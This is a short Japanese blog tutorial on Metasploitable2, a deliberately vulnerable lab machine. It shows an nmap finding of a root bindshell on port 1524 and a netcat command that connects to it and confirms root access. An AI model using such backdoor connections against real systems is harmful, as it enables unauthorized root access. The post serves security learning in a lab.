「Metasploitable2」で学ぶKali Linuxの基本#1[Nmap,vsftpdの脆弱性]今回は、前回インストールしたKali Linuxを触っていきましょう。 https://raspiblog.com/securit...
↑前回
1524/tcp open bindshell Metasploitable root shell
nmapで前回スキャンした際にこのようなものを発見しました。名前にある通り、誰かが作ったrootのバックドアのようです。とりあえず接続してみます。netcatを使います。
Contents
NetCat
netcatはネットワークを扱うツールとして知られています。接続していきます。
$ nc 192.168.56.*** 1524
IPアドレスとポートを設定して実行します。
root@metasploitable:/#
$ whoami root
rootのバックドアであることがわかりました。次回は違うOSでハッキングを実践していきます。
リンク
リンク
リンク
リンク
リンク